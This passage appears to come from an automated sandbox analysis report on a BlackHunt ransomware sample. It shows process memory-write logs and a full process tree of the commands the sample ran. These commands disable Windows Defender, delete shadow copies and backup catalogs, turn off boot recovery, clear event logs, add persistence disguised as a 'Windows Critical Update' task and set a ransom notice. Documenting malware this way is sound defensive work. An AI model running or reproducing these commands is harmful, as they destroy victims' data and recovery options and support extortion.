5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 176 PID 1572 wrote to memory of 4276 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 169 PID 1572 wrote to memory of 4276 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 169 PID 2860 wrote to memory of 2740 2860 Conhost.exe 141 PID 2860 wrote to memory of 2740 2860 Conhost.exe 141 PID 1572 wrote to memory of 4532 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 153 PID 1572 wrote to memory of 4532 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 153 PID 2544 wrote to memory of 220 2544 cmd.exe 107 PID 2544 wrote to memory of 220 2544 cmd.exe 107 PID 1572 wrote to memory of 2944 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 109 PID 1572 wrote to memory of 2944 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 109 PID 1572 wrote to memory of 1448 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 111 PID 1572 wrote to memory of 1448 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 111 PID 1572 wrote to memory of 2368 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 183 PID 1572 wrote to memory of 2368 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 183 PID 1572 wrote to memory of 4344 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 113 PID 1572 wrote to memory of 4344 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 113 PID 1572 wrote to memory of 3932 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 118 PID 1572 wrote to memory of 3932 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 118 PID 1572 wrote to memory of 2964 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 168 PID 1572 wrote to memory of 2964 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 168 PID 4532 wrote to memory of 3464 4532 cmd.exe 167 PID 4532 wrote to memory of 3464 4532 cmd.exe 167 PID 1572 wrote to memory of 2672 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 122 PID 1572 wrote to memory of 2672 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 122 PID 4276 wrote to memory of 4964 4276 cmd.exe 149 PID 4276 wrote to memory of 4964 4276 cmd.exe 149 PID 1572 wrote to memory of 336 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 166 PID 1572 wrote to memory of 336 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 166 PID 4496 wrote to memory of 3700 4496 cmd.exe 165 PID 4496 wrote to memory of 3700 4496 cmd.exe 165 PID 2944 wrote to memory of 2356 2944 cmd.exe 184 PID 2944 wrote to memory of 2356 2944 cmd.exe 184 PID 1572 wrote to memory of 3680 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 129 PID 1572 wrote to memory of 3680 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 129 PID 4344 wrote to memory of 2764 4344 cmd.exe 128 PID 4344 wrote to memory of 2764 4344 cmd.exe 128 PID 1448 wrote to memory of 1400 1448 cmd.exe 126 PID 1448 wrote to memory of 1400 1448 cmd.exe 126 PID 1572 wrote to memory of 1408 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 130 PID 1572 wrote to memory of 1408 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 130 PID 1572 wrote to memory of 3344 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 136 PID 1572 wrote to memory of 3344 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 136 PID 1572 wrote to memory of 3908 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 131 PID 1572 wrote to memory of 3908 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 131 PID 1572 wrote to memory of 2700 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 139 PID 1572 wrote to memory of 2700 1572 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe 139 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe"C:\Users\Admin\AppData\Local\Temp\5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1572 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:4248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:2740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:8556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2860
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:6208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe" /F2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4964 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5ccab5912e17301f6b0abeaf7aeb7d0243854f68b65cb6a1ccc9dc8da1f62e1e.exe" /F3⤵
- Creates scheduled task(s)
PID:9604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3464
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:8092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4276
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2676
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:9592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:10748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3308
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3048
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1252
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5088
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4828
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:19544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:19440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:19496
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:19672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:19548
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:19704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:19732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:19236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:19760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:19180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:19800
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:19972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:19836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:19856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:19920
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:19860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:19344
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:19528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:19396
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:19996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:18796
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:20472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:19568
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:16584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:20008
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:16600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:20080
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:16656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:20060
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:13784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:20052
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:16616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:20020
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:16752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:20232
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:16804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:20248
-
